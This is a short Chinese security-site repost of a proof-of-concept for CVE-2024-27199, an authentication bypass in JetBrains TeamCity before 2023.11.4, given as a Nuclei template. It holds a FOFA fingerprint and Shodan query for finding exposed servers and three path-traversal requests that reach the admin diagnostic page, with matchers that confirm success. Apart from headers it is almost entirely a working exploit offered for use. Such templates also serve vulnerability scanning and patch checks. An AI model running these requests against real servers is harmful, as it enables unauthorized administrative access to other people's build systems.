CVE-2024-27199

admin 2024年4月2日10:38:43评论26 views字数 1240阅读4分8秒阅读模式

使使使

影响版本

app="JET_BRAINS-TeamCity"

CVE-2024-27199

poc&exp

id: CVE-2024-27199info:  name: TeamCity < 2023.11.4 - Authentication Bypass  author: DhiyaneshDk  severity: high  description: |    In JetBrains TeamCity before 2023.11.4 path traversal allowing to perform limited admin actions was possible  reference:    - https://www.rapid7.com/blog/post/2024/03/04/etr-cve-2024-27198-and-cve-2024-27199-jetbrains-teamcity-multiple-authentication-bypass-vulnerabilities-fixed/    - https://nvd.nist.gov/vuln/detail/CVE-2024-27199  classification:    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L    cvss-score: 7.3    cwe-id: CWE-23  metadata:    verified: true    max-request: 3    shodan-query: http.component:"TeamCity"  tags: cve,cve2024,teamcity,jetbrains,auth-bypasshttp:  - method: GET    path:      - "{{BaseURL}}/res/../admin/diagnostic.jsp"      - "{{BaseURL}}/.well-known/acme-challenge/../../admin/diagnostic.jsp"      - "{{BaseURL}}/update/../admin/diagnostic.jsp"    stop-at-first-match: true    matchers:      - type: dsl        dsl:          - 'status_code == 200'          - 'contains(header, "text/html")'          - 'contains_all(body, "Debug Logging", "CPU & Memory Usage")'        condition: and

CVE-2024-27199CVE-2024-27199

原文始发于微信公众号(漏洞猎人):CVE-2024-27199

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月2日10:38:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-27199https://cn-sec.com/archives/2619581.html

发表评论

匿名网友 填写信息